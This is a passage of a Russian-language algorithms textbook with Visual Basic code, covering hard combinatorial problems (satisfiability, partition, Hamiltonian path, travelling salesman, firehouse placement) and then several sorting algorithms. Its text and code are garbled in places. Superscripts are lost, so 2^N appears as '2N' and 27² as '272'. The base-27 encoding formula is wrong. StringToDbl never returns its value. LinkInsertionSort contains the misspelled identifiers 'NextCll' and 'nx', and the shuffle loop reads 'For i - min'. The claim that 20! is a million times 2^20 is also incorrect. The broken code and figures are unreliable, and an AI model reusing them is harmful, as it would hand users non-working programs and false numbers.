Эвристические методы обычно выполняются быстрее, чем метод ветвей и границ. Некоторые из них, например методы восхождения на холм, наименьшей стоимости и сбалансированной прибыли, выполняются очень быстро, так как они рассматривают только одно возможное решение. Они выполняются настолько быстро, что имеет смысл выполнить их все по очереди, и затем выбрать наилучшее из трех полученных решений. Это не гарантирует того, что это решение будет наилучшим, но дает некоторую уверенность, что оно окажется достаточно хорошим.
Другие сложные задачи
Существует множество очень сложных задач, большинство из которых не имеет решений с полиномиальной вычислительной сложностью. Другими словами, не существует алгоритмов, которые решали бы эти задачи за время порядка O(NC) для любых постоянных C, даже за O(N1000).
В следующих разделах кратко описаны некоторые из этих задач. В них также показано, почему они являются сложными в общем случае и насколько большим может оказаться дерево решений задачи. Вы можете попробовать применить метод ветвей и границ или эвристики для решения некоторых из этих задач.
Задача о выполнимости
Если имеется логическое утверждение, например “(A And Not B) Or C”, то существуют ли значения переменных A, B и C, при которых это утверждение истинно? В данном примере легко увидеть, что утверждение истинно, если A = true, B = false и C = false. Для более сложных утверждений, содержащих сотни переменных, бывает достаточно сложно определить, может ли быть утверждение истинным.
При помощи метода, похожего на тот, который использовался при решении задачи о формировании портфеля, можно простроить дерево решений для задачи о выполнимости (satisfiability problem). Каждая ветвь дерева будет соответствовать решению о присвоении переменной значения true или false. Например, левая ветвь, выходящая из корня, соответствует значению первой переменной true.
Если в логическом выражении N переменных, то дерево решений представляет собой двоичное дерево высотой N + 1. Это дерево имеет 2N листьев, каждый из которых соответствует разной комбинации значений переменных.
В задаче о формировании портфеля можно было использовать метод ветвей и границ для того, чтобы избежать поиска в большей части дерева. В задаче о выполнимости выражение либо истинно, либо ложно. При этом нельзя получить частичное решение, которое можно использовать для отсечения путей в дереве.
Нельзя также использовать эвристики для поиска приблизительного решения для задачи о выполнимости. Любое значение переменных, полученное при помощи эвристики, будет делать выражение истинным или ложным. В математической логике не существует такого понятия, как приближенное решение.
Изза неприменимости эвристик и меньшей эффективности метода ветвей и границ, задача о выполнимости обычно является очень сложной и решается только в случае небольшого размера задачи.
Задача о разбиении
Если задано множество элементов со значениями X1, X2, … , XN, то существует ли способ разбить его на два подмножества, так чтобы сумма значений всех элементов в каждом из подмножеств была одинаковой? Например, если элементы имеют значения 3, 4, 5 и 6, то их можно разбить на два подмножества {3, 6} и {4, 5}, сумма значений элементов в каждом из которых равна 9.
Чтобы смоделировать эту задачу при помощи дерева, предположим, что ветвям соответствует помещение элемента в одно из двух подмножеств. Левая ветвь, выходящая из корневого узла, соответствует помещению первого элемента в первое подмножество, а правая ветвь — во второе подмножество.
Если всего существует N элементов, то дерево решение будет представлять собой двоичное дерево высотой N + 1. Оно будет содержать 2N листьев и 2N+1 узлов. Каждый лист соответствует одному из вариантов размещения элементов в двух подмножествах.
При решении этой задачи можно применить метод ветвей и границ. При рассмотрении частичных решений задачи можно отслеживать, насколько различаются суммарные значения элементов в двух подмножествах. Если в какойто момент суммарное значение элементов для одного из подмножеств настолько меньше, чем для другого, что добавление всех оставшихся элементов не позволяет изменить это соотношение, то нет смысла продолжать движение вниз по этой ветви.
Так же, как и в случае с задачей о выполнимости, для задачи о разбиении (partition problem) нельзя получить приближенное решение. В результате всегда должно получиться два подмножества, суммарное значение элементов в которых будет или не будет одинаковым. Это означает, что для решения этой задачи неприменимы эвристики, которые использовались для решения задачи о формировании портфеля.
Задачу о разбиении можно обобщить следующим образом: если имеется множество элементов со значениями X1, X2, … , XN, как разбить его на два подмножества, чтобы разница суммы значений элементов в двух подмножествах была минимальной?
Получить точное решение этой задачи труднее, чем для исходной задачи о разбиении. Если бы существовал простой способ решения задачи в общем случае, то его можно было бы использовать для решения исходной задачи. В этом случае можно было бы просто найти два подмножества, удовлетворяющих условиям, а затем проверить, совпадают ли суммы значений элементов в них.
Для решения общего случая задачи можно использовать метод ветвей и границ, примерно так же, как он использовался для решения частного случая задачи, чтобы избежать поиска по всему дереву. Можно также использовать при этом эвристический подход. Например, можно проверять элементы в порядке убывания их значения, помещая очередной элемент в подмножество с меньшей суммой значений элементов. Также можно было бы легко использовать случайный поиск, метод последовательных приближений, или метод отжига для поиска приближенного решения этого общего случая задачи.
Задача поиска Гамильтонова пути
Если задана сеть, то Гамильтоновым путем (Hamiltonian path) для нее называется путь, обходящий все узлы в сети только один раз и затем возвращающийся в начальную точку.
На рис. 8.9 показана небольшая сеть и Гамильтонов путь для нее, нарисованный жирной линией.
Задача поиска Гамильтонова пути формулируется так: если задана сеть, существует ли для нее Гамильтонов путь?
==============219
@Рис. 8.9. Гамильтонов путь
Так как Гамильтонов путь обходит все узлы в сети, то не нужно определять, какие из узлов попадают в него, а какие нет. Необходимо установить только порядок, в котором их нужно обойти для создания Гамильтонова пути.
Для моделирования этой задачи при помощи дерева, предположим, что ветви соответствуют выбору следующего узла в пути. Корневой узел тогда будет содержать N ветвей, соответствующих началу пути в каждом из N узлов. Каждый из узлов первого уровня будет иметь N – 1 ветвей, по одной ветви для каждого из оставшихся N – 1 узлов. Узлы на следующем уровне дерева будут иметь N – 2 ветвей, и так далее. Нижний уровень дерева будет содержать N! листьев, соответствующих N! возможных путей. Всего в дереве будет находиться порядка O(N!) узлов.
Каждый лист соответствует Гамильтонову пути, но число листьев может быть разным для различных сетей. Если два узла в сети не связаны друг с другом, то в дереве будут отсутствовать ветви, которые соответствуют переходам между этими двумя узлами. Это уменьшает число путей в дереве и соответственно, число листьев.
Так же, как и в задачах о выполнимости и о разбиении, для задачи поиска Гамильтонова пути нельзя получить приближенное решение. Путь может либо являться Гамильтоновым, либо нет. Это означает, что эвристический подход и метод ветвей и границ не помогут при поиске Гамильтонова пути. Что еще хуже, дерево решений для задачи поиска Гамильтонова пути содержит порядка O(N!) узлов. Это намного больше, чем порядка O(2N) узлов, которые содержат деревья решений для задач о выполнимости и разбиении. Например, 220 примерно равно 1 * 10 6, тогда как 20! составляет около 2,4 * 1018 — в миллион раз больше. Изза очень большого размера дерева решений задачи нахождения Гамильтонова пути, поиск в нем можно выполнить только для задач очень небольшого размера.
Задача коммивояжера
Задача коммивояжера (traveling salesman problem) тесно связана с задачей поиска Гамильтонова пути. Она формулируется так: найти самый короткий Гамильтонов путь для сети.
========220
Эта задача имеет примерно такое же отношение к задаче поиска Гамильтонова пути, как обобщенный случай задачи о разбиении к простой задаче о разбиении. В первом случае возникает вопрос о существовании решения. Во втором — какое приближенное решение будет наилучшим. Если бы существовало простое решение второй задачи, то его можно было бы использовать для решения первого варианта задачи.
Обычно задача коммивояжера возникает только в сетях, содержащих большое число Гамильтоновых путей. В типичном примере, коммивояжеру требуется посетить несколько клиентов, используя кратчайший маршрут. В случае обычной сети улиц, любые две точки в сети связаны между собой, поэтому любой маршрут представляет собой Гамильтонов путь. Задача заключается в том, чтобы найти самый короткий из них.
Так же как и в случае поиска Гамильтонова пути, дерево решений для этой задачи содержит порядка O(N!) узлов. Так же, как и в обобщенной задаче о разбиении, для отсечения ветвей дерева и ускорения поиска решения задач средних размеров можно использовать метод ветвей и границ.
Существует также несколько хороших эвристических методов последовательных приближений для задачи коммивояжера. Например, использование стратегии пар путей, при которой перебираются пары отрезков маршрута. Программа проверяет, станет ли маршрут короче, если удалить пару отрезков и заменить их двумя новым, так чтобы маршрут при этом оставался замкнутым. На рис. 8.10 показано как изменяется маршрут, если отрезки X1 и X2 заменить отрезками Y1 и Y2. Аналогичные стратегии последовательных приближений рассматривают замену трех или более отрезков пути одновременно.
Обычно такие шаги последовательного приближения повторяются многократно или до тех пор, пока не будут проверены все возможные пары отрезков пути. После того, как дальнейшие шаги не приводят к улучшениям, можно сохранить результат и начать работу снова, случайным образом выбрав другой исходный маршрут. После проверки достаточно большого числа различных случайных исходных маршрутов, вероятно будет найден достаточно короткий путь.
Задача о пожарных депо
Задача о пожарных депо (firehouse problem) формулируется так: если задана сеть, некоторое число F, и расстояние D, то существует ли способ размесить F пожарных депо таким образом, чтобы все узлы сети находились не дальше, чем на расстоянии D от ближайшего пожарного депо?
@Рис. 8.10. Последовательное приближение при решении задачи коммивояжера
========221
Эту задачу можно смоделировать при помощи дерева решений, в котором каждая ветвь определяет местоположение соответствующего пожарного депо в сети. Корневой узел будет иметь N ветвей, соответствующих размещению первого пожарного депо в одном из N узлов сети. Узлы на следующем уровне дерева будут иметь N – 1 ветвей, соответствующих размещению второго пожарного депо в одном из оставшихся N – 1 узлов. Если всего существует F пожарных депо, то высота дерева решений будет равна F, и оно будет содержать порядка O(NF) узлов. В дереве будет N * (N – 1) * … * (N – F) листьев, соответствующих разным вариантам размещения пожарных депо в сети.
Так же, как и в задачах о выполнимости, разбиении, и поиске Гамильтонова пути, в этой задаче нужно дать положительный или отрицательный ответ на вопрос. Это означает, что при проверке дерева решений нельзя использовать частичные или приближенные решения.
Можно, тем не менее, использовать разновидность метода ветвей и границ, если на ранних этапах решения определить, какие из вариантов размещения пожарных депо не приводят к решению. Например, бессмысленно помещать очередное депо между двумя другими, расположенными рядом. Если все узлы на расстоянии D от нового пожарного депо уже находятся в пределах этого расстояния от другого депо, значит, новое депо нужно поместить в какоето другое место. Тем не менее, такого рода вычисления также отнимают достаточно много времени, и задача все еще остается очень сложной.
Так же, как и для задач о разбиении и поиске Гамильтонова пути, существует обобщенный случай задачи о пожарных депо. В обобщенном случае задача формулируется так: если задана сеть и некоторое число F, в каких узлах сети нужно поместить F пожарных депо, чтобы наибольшее расстояние от любого узла до пожарного депо было минимальным?
Так же, как и обобщенных случаях других задач, для поиска частичного и приближенного решений этой задачи можно использовать метод ветвей и границ и эвристический подход. Это несколько упрощает проверку дерева решений. Хотя дерево решений все еще остается огромным, можно по крайней мере найти приблизительные решения, даже если они и не являются наилучшими.
Краткая характеристика сложных задач
Во время чтения предыдущих параграфов вы могли заметить, что существует два варианта многих сложных задач. Первый вариант задачи задает вопрос: «Существует ли решение задачи, удовлетворяющее определенным условиям?». Второй, более общий случай дает ответ на вопрос: «Какое решение задачи будет наилучшим?»
Обе задачи при этом имеют одинаковое дерево решений. В первом случае дерево решений просматривается до тех пор, пока не будет найдено какоелибо решение. Так как для этих задач не существует частичного или приближенного решения, то обычно нельзя использовать для уменьшения объема работы эвристический подход или метод ветвей и границ. Обычно всего лишь несколько путей в дереве ведут к решению, поэтому решение этих задач — очень трудоемкий процесс.
При решении же обобщенного случая задачи, часто можно использовать частичные решения и применить метод ветвей и границ. Это не облегчает поиск наилучшего решения задачи, поэтому не поможет получить точное решение для частной задачи. Например, сложнее найти самый короткий Гамильтонов путь в сети, чем найти произвольный Гамильтонов путь для той же сети.
==========222
С другой стороны, эти вопросы обычно относятся к различным входным данным. Обычно вопрос о существовании Гамильтонова пути возникает, если сеть разрежена, и сложно сказать, существует ли такой путь. Вопрос о кратчайшем Гамильтоновом пути возникает обычно, если сеть достаточно плотная и существует множество таких путей. В этом случае легко найти частичные решения, и метод ветвей и границ может сильно упростить решение задачи.
Резюме
Можно использовать деревья решений для моделирования различных задач. Поиск наилучшего решения задачи соответствует при этом поиску наилучшего пути в дереве. К сожалению, деревья решений для многих интересных задач имеют огромный размер, поэтому решить такие задачи методом полного перебора можно только для очень небольших задач.
Метод ветвей и границ позволяет отсекать большую часть ветвей в некоторых деревьях решений, что позволяет получать точное решение для задач гораздо большего размера.
Тем не менее, для самых больших задач, даже применение метода ветвей и границ не может помочь. В этом случае, для получения приблизительного решения необходимо использовать эвристический подход для получения приблизительных решений. При помощи методов случайного поиска и последовательных приближений можно найти приемлемое решение, даже если неизвестно, будет ли оно наилучшим возможным решением задачи.
==========223
Глава 9. Сортировка
Сортировка — одна из наиболее активно изучаемых тем в компьютерных алгоритмах по ряду причин. Во-первых, сортировка — это задача, которая часть встречается во многих приложениях. Почти любой список данных будет нести больше смысла, если его отсортировать какимлибо образом. Часто требуется сортировать данные несколькими различными способами.
Вовторых, многие алгоритмы сортировки являются интересными примерами программирования. Они демонстрируют важные методы, такие как частичное упорядочение, рекурсия, слияние списков и хранение двоичных деревьев в массиве.
Наконец, сортировка является одной из немногих задач с точными теоретическими ограничениями производительности. Можно показать, что время выполнения любого алгоритма сортировки, который использует сравнения, составляет порядка O(N * log(N)). Некоторые алгоритмы достигают теоретического предела, то есть они являются оптимальными в этом смысле. Есть даже ряд несколько алгоритмов, которые используют другие методы вместо сравнений, которые выполняются быстрее, чем за время порядка O(N * log(N)).
Общие соображения
В этой главе описаны некоторые алгоритмы сортировки, которые ведут себя поразному в различных обстоятельствах. Например, пузырьковая сортировка опережает быструю сортировку по скорости работы, если сортируемые элементы уже были почти упорядочены, но работает медленнее, если элементы были расположены хаотично.
Особенности каждого алгоритма описаны в параграфе, в котором он обсуждается. Перед тем как перейти к рассмотрению отдельных алгоритмов, вначале в этой главе обсуждаются вопросы, которые влияют на все алгоритмы сортировки.
Таблицы указателей
При сортировке элементов данных, программа организует из них некоторое подобие структуры данных. Этот процесс может быть быстрым или медленным в зависимости от типа элементов. Перемещение целого числа на новое положение в массиве может быть намного быстрее, чем перемещение определенной пользователем структуры данных. Если эта структура представляет собой список данных о сотруднике, содержащий тысячи байт информации, копирование одного элемента может занять достаточно много времени.
========225
Для повышения производительности при сортировке больших объектов можно помещать ключевые поля данных, используемые для сортировки, в таблицу индексов. В этой таблице находятся ключи к записям и индексы элементов другого массива, в котором и находятся записи данных. Например, предположим, что вы собираетесь отсортировать список записей о сотрудниках, определяемый следующей структурой:
Type Emloyee
ID As Integer
LastName As String
FirstName As String
<и т.д.>
End Type
‘ Выделить память под записи.
Dim EmloyeeData(1 To 10000)
Чтобы отсортировать сотрудников по идентификационному номеру, нужно создать таблицу индексов, которая содержит индексы и значения ID values из записей. Индекс элемента показывает, какая запись в массиве EmployeeData содержит соответствующие данные.
Type IdIndex
ID As Integer
Index As Integer
End Type
‘ Таблица индексов.
Dim IdIndexData(1 To 10000)
Проинициализируем таблицу индексов так, чтобы первый индекс указывал на первую запись данных, второй — на вторую, и т.д.
For i = 1 To 10000
IdIndexData(i).ID = EmployeeData(i).ID
IdIndexData(i).Index = i
Next i
Затем, отсортируем таблицу индексов по идентификационному номеру ID. После этого, поле Index в каждом элементе IdIndexData указывает на соответствующую запись данных. Например, первая запись в отсортированном списке — это EmployeeData(IdIndexData(1).Index). На рис. 9.1 показана взаимосвязь между индексом и записью данных до, и после сортировки.
=======226
@Рисунок 9.1. Сортировка с помощью таблицы индексов
Для того, чтобы сортировать данные в разном порядке, можно создать несколько различных таблиц индексов и управлять ими по отдельности. В приведенном примере можно было бы создать еще одну таблицу индексов, упорядочивающую сотрудников по фамилии. Подобно этому списки со ссылками могут сортировать список различными способами, как показано во 2 главе. При добавлении или удалении записи необходимо обновлять каждую таблицу индексов независимо.
Помните, что таблицы индексов занимают дополнительную память. Если создать по таблице индексов для каждого из полей данных, объем занимаемой памяти более чем удвоится.
Объединение и сжатие ключей
Иногда можно хранить ключи списка в комбинированной или сжатой форме. Например, можно было бы объединить (combine) в программе два поля, соответствующих имени и фамилии, в одни ключ. Это позволило бы упростить и ускорить сравнение. Обратите внимание на различия между двумя следующими фрагментами кода, которые сравнивают две записи о сотрудниках:
‘ Используя разные ключи.
If emp1.LastName > emp2.LastName Or _
(emp1.LastName = emp2.LastName And _
And emp1.FirstName > emp2.FirstName) Then
DoSomething
‘ Используя объединенный ключ.
If emp1.CominedName > emp2.CombinedName Then
DoSomething
========227
Также иногда можно сжимать (compress) ключи. Сжатые ключи занимают меньше места, уменьшая размер таблиц индексов. Это позволяет сортировать списки большего размера без перерасхода памяти, быстрее перемещать элементы в списке, и часто также ускоряет сравнение элементов.
Одни из методов сжатия строк — кодирование их целыми числами или данными другого числового формата. Числовые данные занимают меньше места, чем строки и сравнение двух численных значений также происходит намного быстрее, чем сравнение двух строк. Конечно, строковые операции неприменимы для строк, представленных числами.
Например, предположим, что мы хотим закодировать строки, состоящие из заглавных латинских букв. Можно считать, что каждый символ — это число по основанию 27. Необходимо использовать основание 27, чтобы представить 26 букв и еще одну цифру для обозначения конца слова. Без отметки конца слова, закодированная строка AA шла бы после строки B, потому что в строке AA две цифры, а в строке B — одна.
Код по основанию 27 для строки из трех символов дает формула 272 * (первая буква - A + 1) + 27 * (вторая буква - A + 1) + 27 * (третья буква - A + 1). Если в строке меньше трех символов, вместо значения (третья буква - A + 1) подставляется 0. Например, строка FOX кодируется так:
272 * (F - A + 1) + 27 * (O - A + 1) + (X - A +1) = 4803
Строка NO кодируется следующим образом:
272 * (N - A + 1) + 27 * (O - A + 1) + (0) = 10.611
Заметим, что 10.611 больше 4803, поскольку NO > FOX.
Таким же образом можно закодировать строки из 6 заглавных букв в виде числа в формате long и строки из 10 букв — как число в формате double. Две следующие процедуры конвертируют строки в числа в формате double и обратно:
Const STRING_BASE = 27
Const ASC_A = 65 ‘ ASCII код для символа "A".
‘ Преобразование строки с число в формате double.
‘
‘ full_len — полная длина, которую должна иметь строка.
‘ Нужна, если строка слишком короткая (например "AX" —
‘ это строка из трех символов).
Function StringToDbl (txt As String, full_len As Integer) As Double
Dim strlen As Integer
Dim i As Integer
Dim value As Double
Dim ch As String * 1
strlen = Len(txt)
If strlen > full_len Then strlen = full_len
value = 0#
For i = 1 To strlen
ch = Mid$(txt, i, 1)
value = value * STRING_BASE + Asc(ch) - ASC_A + 1
Next i
For i = strlen + 1 To full_len
value = value * STRING_BASE
Next i
End Function
‘ Обратное декодирование строки из формата double.
Function DblToString (ByVal value As Double) As String
Dim strlen As Integer
Dim i As Integer
Dim txt As String
Dim Power As Integer
Dim ch As Integer
Dim new_value As Double
txt = ""
Do While value > 0
new_value = Int(value / STRING_BASE)
ch = value - new_value * STRING_BASE
If ch <> 0 Then txt = Chr$(ch + ASC_A - 1) + txt
value = new_value
Loop
DblToString = txt
End Function
===========228
В табл. 9.1 приведено время выполнения программой Encode сортировки 2000 строк различной длины на компьютере с процессором Pentium и тактовой частотой 90 МГц. Заметим, что результаты похожи для каждого типа кодирования. Сортировка 2000 чисел в формате double занимает примерно одинаковое время независимо от того, представляют ли они строки из 3 или 10 символов.
========229
@Таблица 9.1. Время сортировки 2000 строк с использованием различных кодировок в секундах
Можно также кодировать строки, состоящие не только из заглавных букв. Строку из заглавных букв и цифр можно закодировать по основанию 37 вместо 27. Код буквы A будет равен 1, B — 2, … , Z — 26, код 0 будет 27, … , и 9 — 36. Строка AH7 будет кодироваться как 372 * 1 + 37 * 8 + 35 = 1700.
Конечно, при использовании большего основания, длина строки, которую можно закодировать числом типа integer, long или double будет соответственно короче. При основании равном 37, можно закодировать строку из 2 символов в числе формата integer, из 5 символов в числе формата long, и 10 символов в числе формата double.
Примеры программ
Чтобы облегчить сравнение различных алгоритмов сортировки, программа Sort демонстрирует большинство алгоритмов, описанных в этой главе. Сортировка позволяет задать число сортируемых элементов, их максимальное значение, и порядок расположения элементов - прямой, обратный или расположение в случайном порядке. Программа создает список случайно расположенных чисел в формате long и сортирует его, используя выбранный алгоритм. Вначале сортируйте короткие списки, пока не определите, насколько быстро ваш компьютер может выполнять операции сортировки. Это особенно важно для медленных алгоритмов сортировки вставкой, сортировки вставкой с использованием связного списка, сортировки выбором, и пузырьковой сортировки.
Некоторые алгоритмы перемещают большие блоки памяти. Например, алгоритм сортировки вставкой перемещает элементы списка для того, чтобы можно было вставить новый элемент в середину списка. Для перемещения элементов программе, написанной на Visual Basic, приходится использовать цикл For. Следующий код показывает, как сортировка вставкой перемещает элементы с List(j) до List(max_sorted) для того, чтобы освободить место под новый элемент в позиции List(j):
For k = max_sorted To j Step -1
List(k + 1) = List(k)
Next k
List(j) = next_num
==========230
Интерфейс прикладного программирования системы Windows включает две функции, которые позволяют намного быстрее выполнять перемещение блоков памяти. Программы, скомпилированные 16битной версией компилятора Visual Basic 4, могут использовать функцию hmemcopy. Программы, скомпилированные 32битными компиляторами Visual Basic 4 и 5, могут использовать функцию RtlMoveMemory. Обе функции принимают в качестве параметров конечный и исходный адреса и число байт, которое должно быть скопировано. Следующий код показывает, как объявлять эти функции в модуле .BAS:
#if Win16 Then
Declare Sub MemCopy Lib "Kernel" Alias _
"hmemcpy" (dest As Any, src As Any, _
ByVal numbytes As Long)
#Else
Declare Sub MemCopy Lib "Kernel32" Alias _
"RtlMoveMemory" (dest As Any, src As Any, _
ByVal numbytes As Long)
#EndIf
Следующий фрагмент кода показывает, как сортировка вставкой может использовать эти функции для копирования блоков памяти. Этот код выполняет те же действия, что и цикл For, приведенный выше, но делает это намного быстрее:
If max_sorted >= j Then _
MemCopy List(j + 1), List(j), _
Len(next_num) * (max_sorted - j + 1)
List(j) = next_num
Программа FastSort аналогична программе Sort, но она использует функцию MemCopy для ускорения работы некоторых алгоритмов. В программе FastSort алгоритмы, использующие функцию MemCopy, выделены синим цветом.
Сортировка выбором
Сортировка выбором (selectionsort) — простой алгоритм со сложность порядка O(N2). Идея состоит в поиске наименьшего элемента в списке, который затем меняется местами с элементом на вершине списка. Затем находится наименьший элемент из оставшихся, и меняется местами со вторым элементом. Процесс продолжается до тех пор, пока все элементы не займут свое конечное положение.
Public Sub Selectionsort(List() As Long, min As Long, max As Long)
Dim i As Long
Dim j As Long
Dim best_value As Long
Dim best_j As Long
For i = min To max - 1
‘ Найти наименьший элемент из оставшихся.
best_value = List(i)
best_j = i
For j = i + 1 To max
If List(j) < best_value Then
best_value = List(j)
best_j = j
End If
Next j
‘ Поместить элемент на место.
List(best_j) = List(i)
List(i) = best_value
Next i
End Sub
========231
При поиске I-го наименьшего элемента, алгоритму приходится перебрать N-I элементов, которые еще не заняли свое конечное положение. Время выполнения алгоритма пропорционально N + (N - 1) + (N - 2) + … + 1, или порядка O(N2).
Сортировка выбором неплохо работает со списками, элементы в которых расположены случайно или в прямом порядке, но несколько хуже, если список изначально отсортирован в обратном порядке. Для поиска наименьшего элемента в списке сортировка выбором выполняет следующий код:
If list(j) < best_value Then
best_value = list(j)
best_j = j
End If
Если первоначально список отсортирован в обратном порядке, условие list(j) < best_value выполняется большую часть времени. Например, при первом проходе оно будет истинно для всех элементов, поскольку каждый элемент меньше предыдущего. Алгоритм будет многократно выполнять строки с оператором If, что приведет к некоторому замедлению работы алгоритма.
Это не самый быстрый алгоритм из числа описанных в главе, но он чрезвычайно прост. Это не только облегчает его разработку и отладку, но и делает сортировку выбором достаточно быстрой для небольших задач. Многие другие алгоритмы настолько сложны, что они сортируют очень маленькие списки медленнее.
Рандомизация
В некоторых программах требуется выполнение операции, обратной сортировке. Получив список элементов, программа должна расположить их в случайном порядке. Рандомизацию (unsorting) списка несложно выполнить, используя алгоритм, похожий на сортировку выбором.
Для каждого положения в списке, алгоритм случайным образом выбирает элемент, который должен его занять из тех, которые еще не были помещены на свое место. Затем этот элемент меняется местами с элементом, который, находится на этой позиции.
Public Sub Unsort(List() As Long, min As Long, max As Long)
Dim i As Long
Dim Pos As Long
Dim tmp As Long
For i - min To max - 1
pos = Int((max - i + 1) * Rnd + i)
tmp = List(pos)
List(pos) = List(i)
List(i) = tmp
Next i
End Sub
==============232
Т.к. алгоритм заполняет каждую позицию только один раз, его сложность порядка O(N).
Несложно показать, что вероятность того, что элемент окажется на какойлибо позиции, равна 1/N. Поскольку элемент может оказаться в любом положении с равной вероятностью, этот алгоритм действительно приводит к случайному размещению элементов.
Результат зависит от того, насколько хорошим является генератор случайных чисел. Функция Rnd в Visual Basic дает приемлемый результат для большинства случаев. Следует убедиться, что программа использует оператор Randomize для инициализации функции Rnd, иначе при каждом запуске программы функция Rnd будет выдавать одну и ту же последовательность «случайных» значений.
Заметим, что для алгоритма не важен первоначальный порядок расположения элементов. Если вам необходимо неоднократно рандомизировать список элементов, нет необходимости его предварительно сортировать.
Программа Unsort показывает использование этого алгоритма для рандомизации отсортированного списка. Введите число элементов, которые вы хотите рандомизировать, и нажмите кнопку Go (Начать). Программа показывает исходный отсортированный список чисел и результат рандомизации.
Сортировка вставкой
Сортировка вставкой (insertionsort) — еще один алгоритм со сложностью порядка O(N2). Идея состоит в том, чтобы создать новый сортированный список, просматривая поочередно все элементы в исходном списке. При этом, выбирая очередной элемент, алгоритм просматривает растущий отсортированный список, находит требуемое положение элемента в нем, и помещает элемент на свое место в новый список.
Public Sub Insertionsort(List() As Long, min As Long, max As Long)
Dim i As Long
Dim j As Long
Dim k As Long
Dim max_sorted As Long
Dim next_num As Long
max_sorted = min -1
For i = min To max
‘ Это вставляемое число.
Next_num = List(i)
‘ Поиск его позиции в списке.
For j = min To max_sorted
If List(j) >= next_num Then Exit For
Next j
‘ Переместить большие элементы вниз, чтобы
‘ освободить место для нового числа.
For k = max_sorted To j Step -1
List(k + 1) = List(k)
Next k
‘ Поместить новый элемент.
List(j) = next_num
‘ Увеличить счетчик отсортированных элементов.
max_sorted = max_sorted + 1
Next i
End Sub
=======233
Может оказаться, что для каждого из элементов в исходном списке, алгоритму придется проверять все уже отсортированные элементы. Это происходит, например, если в исходном списке элементы были уже отсортированы. В этом случае, алгоритм помещает каждый новый элемент в конец растущего отсортированного списка.
Полное число шагов, которые потребуется выполнить, составляет 1 + 2 + 3 + … + (N - 1), то есть O(N2). Это не слишком эффективно, если сравнить с теоретическим пределом O(N * log(N)) для алгоритмов на основе операций сравнения. Фактически, этот алгоритм не слишком быстр даже в сравнении с другими алгоритмами порядка O(N2), такими как сортировка выбором.
Достаточно много времени алгоритм сортировки вставкой тратит на перемещение элементов для того, чтобы вставить новый элемент в середину отсортированного списка. Использование для этого функции API MemCopy увеличивает скорость работы алгоритма почти вдвое.
Достаточно много времени тратится и на поиск правильного положения для нового элемента. В 10 главе описано несколько алгоритмов поиска в отсортированных списках. Применение алгоритма интерполяционного поиска намного ускоряет выполнение алгоритма сортировки вставкой. Интерполяционный поиск подробно описывается в 10 главе, поэтому мы не будем сейчас на нем останавливаться.
Программа FastSort использует оба этих метода для улучшения производительности сортировки вставкой. С использованием функции MemCopy и интерполяционного поиска, эта версия алгоритма более чем в 15 раз быстрее, чем исходная.
Вставка в связных списках
Можно использовать вариант сортировки вставкой для упорядочения элементов не в массиве, а в связном списке. Этот алгоритм ищет требуемое положение элемента в растущем связном списке, и затем помещает туда новый элемент, используя операции работы со связными списками.
=========234
Public Sub LinkInsertionSort(ListTop As ListCell)
Dim new_top As New ListCell
Dim old_top As ListCell
Dim cell As ListCell
Dim after_me As ListCell
Dim nxt As ListCell
Set old_top = ListTop.NextCell
Do While Not (old_top Is Nothing)
Set cell = old_top
Set old_top = old_top.NextCell
‘ Найти, куда необходимо поместить элемент.
Set after_me = new_top
Do
Set nxt = after_me.NextCell
If nxt Is Nothing Then Exit Do
If nxt.Value >= cell.Value Then Exit Do
Set after_me = nxt
Loop
‘ Вставить элемент после позиции after_me.
Set after_me.NextCll = cell
Set cell.NextCell = nx
Loop
Set ListTop.NextCell = new_top.NextCell
End Sub
Т.к. этот алгоритм перебирает все элементы, может потребоваться сравнение каждого элемента со всеми элементами в отсортированном списке. В этом наихудшем случае вычислительная сложность алгоритма порядка O(N2).
Наилучший случай для этого алгоритма достигается, когда исходный список первоначально отсортирован в обратном порядке. При этом каждый последующий элемент меньше, чем предыдущий, поэтому алгоритм помещает его в начало отсортированного списка. При этом требуется выполнить только одну операцию сравнения элементов, и в наилучшем случае время выполнения алгоритма будет порядка O(N).
В усредненном случае, алгоритму придется провести поиск примерно по половине отсортированного списка для того, чтобы найти местоположение элемента. При этом алгоритм выполняется примерно за 1 + 1 + 2 + 2 + … + N/2, или порядка O(N2) шагов.
Улучшенная процедура сортировки вставкой, использующая интерполяционный поиск и функцию MemCopy, работает намного быстрее, чем версия со связным списком, поэтому последнюю процедуру лучше использовать, если программа уже хранит элементы в связном списке.
Преимущество использования связных списков для вставки в том, что при этом перемещаются только указатели, а не сами записи данных. Передача указателей может быть быстрее, чем копирование записей целиком, если элементы представляют собой большие структуры данных.
=======235
Пузырьковая сортировка
Пузырьковая сортировка (bubblesort) — это алгоритм, предназначенный для сортировки списков, которые уже находятся в почти упорядоченном состоянии. Если в начале процедуры список полностью отсортирован, алгоритм выполняется очень быстро за время порядка O(N). Если часть элементов находятся не на своих местах, алгоритм выполняется медленнее. Если первоначально элементы расположены в случайном порядке, алгоритм выполняется за время порядка O(N2). Поэтому перед применением пузырьковой сортировки важно убедиться, что элементы в основном расположены по порядку.
При пузырьковой сортировке список просматривается до тех пор, пока не найдутся два соседних элемента, расположенных не по порядку. Тогда они меняются местами, и процедура продолжается дальше. Алгоритм повторяет этот процесс до тех пор, пока все элементы не займут свои места.
На рис. 9.2 показано, как алгоритм вначале обнаруживает, что элементы 6 и 3 расположены не по порядку, и поэтому меняет их местами. Во время следующего прохода, меняются местами элементы 5 и 3, в следующем — 4 и 3. После еще одного прохода алгоритм обнаруживает, что все элементы расположены по порядку, и завершает работу.
Можно проследить за перемещениями элемента, который первоначально был расположен ниже, чем после сортировки, например элемента 3 на рис. 9.2. Во время каждого прохода элемент перемещается на одну позицию ближе к своему конечному положению. Он движется к вершине списка подобно пузырьку газа, который всплывает к поверхности в стакане воды. Этот эффект и дал название алгоритму пузырьковой сортировки.
Можно внести в алгоритм несколько улучшений. Вопервых, если элемент расположен в списке выше, чем должно быть, вы увидите картину, отличную от той, которая приведена на рис. 9.2. На рис. 9.3 показано, что алгоритм вначале обнаруживает, что элементы 6 и 3 расположены в неправильном порядке, и меняет их местами. Затем алгоритм продолжает просматривать массив и замечает, что теперь неправильно расположены элементы 6 и 4, и также меняет их местами. Затем меняются местами элементы 6 и 5, и элемент 6 занимает свое место.
@Рис. 9.2. «Всплывание» элемента
========236
@Рис. 9.3. «Погружение» элемента
